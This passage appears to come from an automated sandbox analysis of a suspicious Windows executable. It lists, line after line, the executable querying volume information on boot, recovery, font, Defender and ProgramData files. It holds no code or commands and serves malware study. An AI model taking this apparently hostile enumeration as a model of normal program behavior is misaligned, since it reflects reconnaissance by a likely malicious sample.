                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fi-FI\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fr-CA\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\Users\Public\Desktop\Acrobat Reader DC.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fr-CA\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\Users\Public\Desktop\Google Chrome.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fr-FR\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fr-FR\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\fr-FR\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\MF\Active.GRL VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\hr-HR\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\MF\Pending.GRL VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\hr-HR\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\hu-HU\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\hu-HU\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\hu-HU\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\it-IT\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\it-IT\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\OFFICE\AssetLibrary.ico VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\it-IT\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\OFFICE\MySharePoints.ico VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ja-JP\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ja-JP\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\OFFICE\MySite.ico VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ja-JP\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ko-KR\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ko-KR\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ko-KR\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\lt-LT\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\lt-LT\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\lv-LV\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\lv-LV\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\memtest.efi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\nb-NO\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\nb-NO\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\nb-NO\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\nl-NL\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\nl-NL\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\nl-NL\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pl-PL\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pl-PL\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\wfp\wfpdiag.etl VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pl-PL\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pt-BR\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.EXCEL.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pt-BR\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.GRAPH.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pt-BR\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.GROOVE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pt-PT\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.LYNC.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pt-PT\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.MSOUC.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\pt-PT\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.MSPUB.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\qps-ploc\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\nslist.hxl VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ro-RO\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ro-RO\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ru-RU\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ru-RU\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\ru-RU\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sk-SK\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sk-SK\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\USOShared\Logs\NotifyIcon.001.etl VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\USOShared\Logs\NotifyIcon.002.etl VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sl-SI\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\USOShared\Logs\NotifyIcon_Temp.1.etl VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sl-SI\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\USOShared\Logs\UpdateUx_Temp.1.etl VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sr-Latn-RS\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sr-Latn-RS\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sv-SE\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sv-SE\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\sv-SE\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\IdentityCRL\INT\wlidsvcconfig.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\tr-TR\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\IdentityCRL\production\wlidsvcconfig.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\tr-TR\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\tr-TR\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\uk-UA\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\uk-UA\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\winsipolicy.p7b VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edbres00002.jrs VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\zh-CN\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\zh-CN\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\zh-CN\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\zh-TW\bootmgfw.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\zh-TW\bootmgr.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\zh-TW\memtest.efi.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\OFFICE\DocumentRepository.ico VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\BOOTSTAT.DAT VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\chs_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\OFFICE\SharePointPortalSite.ico VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\cht_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\OFFICE\SharePointTeamSite.ico VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\jpn_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jcp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\kor_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\malgunn_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edbtmp.jtx VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\malgun_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\meiryon_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\meiryo_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00001.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msjhn_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msjh_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msyhn_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\msyh_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\segmono_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\segoen_slboot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\segoe_slboot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Fonts\wgl4_boot.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\Resources\en-US\bootres.dll.mui VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2010.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\BCD.LOG1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftNotepad.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Boot\BCD.LOG2 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD.LOG VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\NetworkPrinters.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD.LOG1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Microsoft\Recovery\BCD.LOG2 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\ThemeSettings2013.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\EFI\Boot\bootx64.efi VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\defaultuser0.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\guest.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\pratesh.dat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-192.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-32.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-40.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user-48.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.bmp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\User Account Pictures\user.png VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\AppxProvisioning.xml VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Caches\cversions.2.db VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\DeviceMetadataCache\dmrc.idx VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\05 - Music.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\06 - Pictures.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\07 - Videos.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu Places\09 - Network.lnk VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.DATABASECOMPARE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.LYNC_BASIC.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.LYNC_ONLINE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.MSACCESS.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.ONENOTE.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.OUTLOOK.16.1033.hxn VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\98j0BL6iLT.exeQueries volume information: C:\ProgramData\Microsoft Help\MS.POWERPNT.16.1033.hxn VolumeInformationJump to behavior
